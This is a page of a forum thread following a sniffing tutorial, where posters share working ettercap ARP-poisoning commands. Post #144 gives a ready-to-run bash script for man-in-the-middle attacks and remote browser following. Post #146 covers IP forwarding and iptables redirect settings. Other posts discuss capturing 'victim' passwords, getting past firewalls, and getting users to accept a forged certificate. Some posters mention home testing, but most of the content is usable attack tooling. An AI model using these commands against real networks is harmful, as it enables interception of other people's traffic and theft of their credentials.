Page 15 of 25 FirstFirst ... 51314151617 ... LastLast
Results 141 to 150 of 248

Thread: Sniffing Tutorial:

  1. #141
    Member
    Join Date
    Mar 2007
    Posts
    204

    Default

    its probably not a good idea to test that on the school network :P if your unsure of what your doing... not to mention it being a complete breach of the data protection act...

  2. #142

    Default

    Not quite. I'm not "testing" it on the school network as such. I am testing it on my home network, then in my job as the Network Security dude, I am going to see if our network is vulnerable to it (but obviously in a controlled environment - wouldn't want to steal all the kids email passwords :P - I can't really anyway, I gotta pass everything through my supervisor). About to test it at home just now

    Edit: (tested)
    Yeah, I can't add a custom host to the hosts list, it has to be found. I can add a custom target, but this does nothing. So I'm gonna have to wait for it to scan through all my subnet, as it scans all of 10.*.*.* so thats 255^3 hosts, that it scans randomly :/ Wish there was an easier way to do this. Ah well, thanks for your guidance.

    -Stephen

  3. #143
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    11

    Default

    thanks for the tutorial, very straight forward.

  4. #144

    Default

    Figured it out. The only issue was that it was scanning too many hosts, and I couldn't specify what to scan only without using the command line (which I didn't know at the time). For all the lazy people, the following script will work for you. Just copy and paste it into a new file, save as "ettercap_arp.sh" and change permissions with either (in the terminal):
    chmod +x ettercap_arp.sh or
    chmod 777 ettercap_arp.sh depending on your preference.
    Then just run it. Simple.
    #!/bin/bash
    echo "Enter choice"
    echo "Normal is regular ARP Poisoning"
    echo "Follow Browser follows remote browser activity"
    echo "Quit is simple..."
    select CHOICE in Normal FollowBrowser Quit
    do
    case "$CHOICE" in
    "Normal")
    echo "Input IP range to scan"
    echo ""
    echo "Use the format 10.1.1.1-5"
    echo "to scan all between, or 10.1.1.1,5 to scan just"
    echo "10.1.1.1 and 10.1.1.5"
    read IP
    echo "Now ARP Poisoning the chosen hosts!"
    sudo ettercap -Tq -M arp:remote /$IP/ -P autoadd
    ;;
    "FollowBrowser")
    echo "Input single IP"
    read IP
    echo "Now ARP Poisoning the chosen IP"
    sudo ettercap -Tq -M arp:remote /$IP/ -P remote_browser autoadd
    ;;
    "quit")
    exit
    ;;
    esac
    done
    -Stephen

  5. #145
    Just burned his ISO
    Join Date
    Mar 2010
    Posts
    17

    Default

    When I make the arp poisoning, my victim computer can't connect to any site, he don't lose the connection but can't get any site.
    Any ideas?

    Thanks

  6. #146

    Default

    Make sure that your IP forwarding is set up correctly, and that you include the router's IP address in the list of those that you are ARP poisoning (or the Default Gateways address if you don't connect directly to the router).
    bt ~ # echo 1 > /proc/sys/net/ipv4/ip_forwardf
    then
    bt ~ # kedit /usr/local/etc/etter.conf
    and change this:
    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    to this:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    then an example command:
    sudo ettercap -Tq -M arp:remote /10.1.1.1-20/ -P autoadd

    -Stephen

  7. #147
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    3

    Default Firewall

    I am testing this on my network and everything works fine. However, when the ''victim'' computer has a firewall turned on, I don't get any passwords or anything else.

    Is there a way to get through firewalls ?

  8. #148
    Just burned his ISO
    Join Date
    Mar 2008
    Posts
    3

    Default

    Quote Originally Posted by elgros View Post
    I am testing this on my network and everything works fine. However, when the ''victim'' computer has a firewall turned on, I don't get any passwords or anything else.

    Is there a way to get through firewalls ?
    While this doesn't have anything to do with firewalls, I have just found out that I cant find any hosts using my wireless card, however when using my Ethernet adapter, everything is fine. Any idea what my cause my wifi card to not find any hosts ?

  9. #149
    Junior Member
    Join Date
    Feb 2006
    Posts
    91

    Default

    Quote Originally Posted by yeehaw View Post
    Hello,

    I never thought that my little tutorial would become such a big thread.
    I first thought of making a video about this subject, but I think it isn't necessary, but if some people still would like a video tutorial, please tell me.

    yeehaw

    Ps. Please point out any grammar mistakes I make while typing, so I can make my english better.

    A video tutorial would be useful for noobie like me. Looking forward to watching your video tutorial

    Thanks

  10. #150

    Default

    Well, firewalls have nothing to do with it - the website just needs to be right, and the user needs to accept the certificate. In terms of wireless - just make sure you include the gateway in the IP range. The command I usually use is:
    sudo ettercap -Tq -M arp:remote /10.1.1.1-5/ -p autoadd (that way it adds any other hosts)

    -Stephen

Page 15 of 25 FirstFirst ... 51314151617 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •